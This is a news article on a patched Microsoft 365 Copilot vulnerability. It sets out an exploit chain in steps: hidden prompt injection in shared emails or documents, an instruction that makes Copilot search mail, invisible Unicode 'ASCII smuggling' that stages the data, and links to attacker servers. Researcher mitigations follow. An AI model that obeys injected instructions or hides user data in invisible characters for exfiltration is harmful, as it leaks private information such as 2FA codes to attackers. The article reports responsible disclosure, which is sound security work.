Microsoft patched a flaw in Microsoft 365 Copilot, which could lead to data theft of sensitive information. The method, termed ASCII smuggling, could exploit the flaw to steal users’ personal information.
ASCII smuggling is a technique which uses Unicode characters that mirror ASCII without being visible in the user interface. The attack results in sensitive data in emails, such as two-factor authentication codes, being sent to an attacker-controlled server. Following responsible disclosure in January 2024, Microsoft patched the vulnerability.
A report by security researcher Johann Rehberger said, “This means that an attacker can have the [large language model] render, to the user, invisible data, and embed them within clickable hyperlinks. This technique stages the data for exfiltration!”
The method strings multiple attack techniques to create an effective exploit chain. The steps of the technique are as follows:
- Prompt injection by sharing documents or emails with hidden malicious content in the chat.
- Utilising a prompt injection payload to instruct Copilot to search for emails and documents.
- Using ASCII smuggling to create data for exfiltration, which is invisible to the user.
- Rendering hyperlinks to adversary-controlled domains such as websites and mailto links.
The patch comes after proof-of-concept was demonstrated against Microsoft’s Copilot system to manipulate, extract private information, and evade security measures. The methods, previously discussed by Zenity, enable indirect prompt injection and retrieval-augmented generation poisoning, which could lead to remote execution of codes that grant full control over Microsoft Copilot and other AI apps.
The company received the following recommendations from Rehberger to mitigate the issue:
- Halting interpretation and rendering of Unicode Tags Code Points.
- Rendering of clickable hyperlinks would lead to phishing and scams.
- Automatic Tool Invocation is a problem as prompt injection has no fixes. Sensitive information can be brought into the prompt context, and actions can be executed using tools.
The mitigation would require tools not to be used automatically and hidden characters and hyperlinks not to be rendered. Microsoft stated that publicly exposed Copilot bots developed through Microsoft Copilot Studio without authentication protections are at risk of personal data theft if the threat actor is assumed to know the Copilot name or URL.
While it is unclear how the exploit was patched, Rehberger said that exploits built and shared with them in January and February do not work anymore. Links are not being rendered now, excluding prompt injection.
In the News: Amazon to unveil new Alexa in October at $10 per month subscription